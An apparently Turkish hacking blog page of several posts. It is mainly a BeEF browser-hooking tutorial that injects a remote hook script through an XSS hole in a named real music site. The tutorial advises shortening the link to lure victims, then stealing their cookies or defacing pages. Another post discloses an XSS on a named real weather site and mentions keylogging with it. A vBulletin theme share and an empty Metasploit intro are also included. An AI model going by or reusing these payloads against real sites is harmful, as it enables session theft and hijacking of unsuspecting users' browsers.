Metasploit etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Metasploit etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

19 Ocak 2012 Perşembe

BeEF Anlatım

Selamun Aleyküm arkadaşlar.
Uzun bir süredir anlatım yapmıyorum.Aktiflik sıkıntısı yaşıyordum.Vakit buldum ve bu anlatımı yapmak istedim.
Sizlere BeEF uygulamasından bahsedeceğim.BeEF kişinin tarayıcısını kontrol altına almanızı sağlayan içinde fazla özelliği bulunan bir uygulamadır.Nasıl yediririr derseniz onuda bir aşağılarda anlatıcam.Windows ve backtrack üzerinde kullanılabilir.Backtrackta zaten default olarak gelmektedir.Ben BT üzerinden göstereceğim.Benimde sevdiğim güzel bir yöntemdir.

Bt tarafında BeEF kısmında ulaşmak için
BackTrack - Exploitation Tools - Social Engineering Tools - BeEF XSS Framework - beef
Yolunu izliyoruz :)



Karşınıza bu tip html içerisinde bazı kodlar gelecektir.Bunlar siteye gömmek isterseniz diye javascript kodlarıdır.Ben xss üzerinden anlatıma devam edeceğim.

İlk olarak arada bir adres göreceksiniz http://192.168.87.129/beef/ girdiğiniz zaman karşınıza direk beef ekranı gelecektir zaten.



Apply config diyoruz.
Edit 'pw.php' in BeEF root to alter the password
yazıyor yan tarafta.
pw.php dosyasından şifreye bakarsak default olarak BeEFConfigPass girilmiştir.Apply sonrasında finish'e tıklıyoruz.Moduller vs geliyor.



Şimdi xss kısmında kullanacağımız kodu görmek için http://192.168.87.129/beef/hook/example.php linkine bakıyoruz.

<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

kodu geldi.Bunu xss olan bir sitede kullanacağız.Örnek şuan benim elimde TTnet müzik bulunmakta.Bu linki kolayca yedirebiliriz.Kodları xss olan kısma yerleştiriyoruz.

www.ttnetmuzik.com.tr/#arama-<script>alert(document.domain)</script>

http://www.ttnetmuzik.com.tr/#arama-<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

Bunu tıklanma kısmı kalıyor.Bazen linkler çok uzun geliyor insanlar tıklamadan önce düşünüyor bu gibi durumlarda linkleri kısaltmak için siteler mevcut.Karşı taraf linke tıkladığı zaman zombies kısmında görünecektir..



Örnek karşı tarayıcıdaki kişiye bir mesaj göndermek istiyoruz.O zaman zombies kısmındaki ip adresine bir kere tıklıyoruz seçili hale getiriyoruz ardından standart modul kısmında alert dialog kısmını seçiyoruz.Mesajı yazıyoruz ve send now diyoruz.Ben sanal pc backtrack üzerinden windows'a uyguluyorum bunları...



Standart modul kısmında en alt kısımda raw javascript görmektesiniz.Buda kurbanda javascript kodlarını çalıştırmanıza olanak sağlar.Böylece cookie bilgilerini çekebilirsiniz.gene standart kısmında deface web page ile sayfayı komple değiştirip kendi yazınızı koyabilirsiniz.

Daha bir çok özellik bulunmaktadır.Ben temel şeylerden ve nasıl yapılacağından bahsettim.Biraz kurcalama ile bu işi kolayca başarabilirsiniz.

Hem zaman derim XSS'de iş var ^^

8 Ekim 2011 Cumartesi

havadurumu mynet xss

Bulalı bayağı oldu öyle arşive atmışım.Yakında çekeceğim video için paylaşıyorum açıkçası.Şimdi bununla nolcak derseniz backtrack tarafında bu xss açıklarını bir keylogger gibi kullanabilirsiniz.Onun da anlatımını boş bir günümde yapacağım.Bu aralar biraz meşgul'um.Ben önceden siteyi koydum ^^

##########################
# Title: havadurumu mynet xss
# Author: Mr.PaPaRoSSe | DarkDevilZ.in
##########################

http://havadurumu.mynet.com/



p4 vb theme

Selamun Aleyküm arkadaşlar.
Can sıkıntısına bir tane vb teması yaptım.Paylaşayım dedim.
Sabah 6:40'da başladım 14:43'de bitti.
Cevapla butonundan ihbar butonuna kadar hepsi çalışmaktadır.
Yani örnek olarak internette bir arama yaptığınızda çoğu sitede adam linkler kısmını resim olarak vermektedir.Ama siz yeni konu dediğinizde birşey çıkmayacaktır.Yeni konu dediğinizde yeni konunun açılması için şöyle bir kod gerekmektedir.

<if condition="$show['newthreadlink']"><a href="newthread.php?$session[sessionurl]do=newthread&amp;f=$foruminfo[forumid]" rel="nofollow"><img src="files/kate/newkonu.png" alt="$vbphrase[post_new_thread]" border="0" />

Bu tip bir kod işinizi görenecektir.Ben bunların hepsini hazırladım yaptım bitirdim halletim ^^
Üstte header tarafındaki menude kurallar kısımlarına filan link vermedim siz onları kafanıza göre yaparsınız.

3.8.6 üzerinde yaptım.Menuleri filan kendim ps ile yaptım.Uzmanlık alanları kısmı yada işte ünvan madalyon filan eklemedim çünkü şimdi postbit_legacy tarafına baktığınız da benim kodlardan filan kafanız karışsın istemedim.Siz isterseniz eklersiniz zor birşey değil sonuçta.
Onun dışında Memberinfo tarafı ile pek oynamadım basit bir düzenleme yaptım.Şu anda yazmaya devam ettiğim bir memberinfo var bittiğinde paylaşacağım.
Başka bir sayfada login olmanız lazım.Login kısmını sildim.İnternetten vbulletin ayrı sayfadan login diye aratırsanız kodları çıkar zaten.Yada vb ek sayfa yapmak şeklinde.

Resimleri üyenin gözünden ve misafirin gözünden olmak üzere 2'ye ayırdım.
Üye olmayanlara menuleri gizledim.
Resimleri ps ile birleştirdim.

-----------------------------------------------------------
Misafirin Gözlerinden;

Forumhome







------------------------------------------------------------

Bence o kadar da kötü sayılmaz ^^
Benden bu kadar takıldığınız bir yer olursa sorarsınız.
Selametle...


Not: Rar'ın içine 2 tane vbulletin-style.xml koydum.Bende biri çalışıyor biri çalışmıyor.Arkadaşta da diğeri hata vermiş.Her ihtimale karşı 2'sinide koydum.Ve ss'lerde imleç çıkmış kusura bakmayın mozillada  tam ben basarkene gelmiş ^^


İNDİR
http://www.dosya.tc/server4/EzMYNC/tema.rar.html
http://hotfile.com/dl/131791239/93b3d54/tema.rar.html

15 Eylül 2011 Perşembe

Metasploit | BackTrack | Mr.PaPaRoSSe

Tamam kabul ediyorum başlık bıraz saçma oldu.

"backtrack|metasploit|p4"
Ama en uygun başlık bu bence :)
Elimden geldiğince backtrack-metasploit üzerinde anlatımlar yapıcam.
İlk anlatımlar ile başlıyoruz.
Hadi bakalım...










Selametle...
Tayfun # Mr.PaPaRoSSe